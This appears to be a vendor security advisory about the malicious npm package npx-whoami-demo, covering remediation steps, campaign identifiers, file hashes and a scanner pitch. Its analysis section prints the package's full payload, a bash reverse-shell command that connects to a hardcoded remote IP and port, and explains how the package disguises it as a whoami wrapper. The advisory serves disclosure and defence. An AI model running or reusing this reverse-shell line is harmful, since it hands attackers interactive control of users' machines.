Which versions of npx-whoami-demo are malicious?

The following npm versions of npx-whoami-demo are flagged malicious: 1.0.0. Treat any of these as compromised.

How do I remediate npx-whoami-demo if I installed it?

Remove npx-whoami-demo from your project and lockfile, then assume any secrets accessible to the build or runtime were exposed: rotate API keys, tokens, and credentials, and audit for unexpected outbound network activity or persistence. Use O3 Security's dependency scanner to confirm the package and its artifacts are fully purged across your stack.

Is npx-whoami-demo part of a known attack campaign?

Yes — npx-whoami-demo is associated with the IN-MAL-2026-006472, IN-MAL-2026-006473 campaign. Packages in the same campaign often share infrastructure and payloads, so check whether any related packages are also in your dependency tree.

Can O3 Security detect npx-whoami-demo in my codebase?

Yes. O3 Security's supply-chain scanner checks every dependency against known-malicious package intelligence at install time and in CI, blocking npx-whoami-demo and packages like it before any post-install script runs.

Malicious package

npx-whoami-demonpm

Malicious code in npx-whoami-demo (npm) Remove it immediately and rotate any exposed credentials.

MAL-2026-5772

Immediate action

Remove the package, then rotate any secrets the build/runtime could reach.

npm uninstall npx-whoami-demo

What this malware does

The package's only code file (index.js, also registered as the package's bin entry) unconditionally executes require('child_process').execSync("bash -c \"bash -i >& /dev/tcp/101.43.232.7/7777 0>&1\"", { stdio: 'inherit' }). This opens an interactive reverse shell from the user's machine to the hardcoded remote host 101.43.232.7 on TCP port 7777, giving the operator of that endpoint a full interactive shell with the privileges of the invoking user. The package advertises itself as a thin wrapper that runs whoami, but no whoami invocation exists in the code — the stated purpose is a cover story for the backdoor. The reverse shell fires whenever the bin is invoked, including via npx npx-whoami-demo, which is the documented usage pattern.

Malicious versions

1 flagged

1.0.0

Indicators of compromise (SHA-256)

0971bcb88de070f17d932feff04cd6e66ecc825f606b412414457a3afb4ad174

fd8ebad9242ca5fc2abd9e3951a31bb3f4574f6ca07894be2b12468ccd2e5279

Frequently asked questions

No. npx-whoami-demo on npm has been identified as a malicious package (version 1.0.0 flagged). It should be removed immediately — do not install or keep it in your dependency tree.

Campaign

IN-MAL-2026-006472IN-MAL-2026-006473

References

npmjs.com

Credits

Amazon Inspector · finder

Scan your dependencies

O3 Security blocks malicious packages like this at install time and in CI.

Supply-chain protection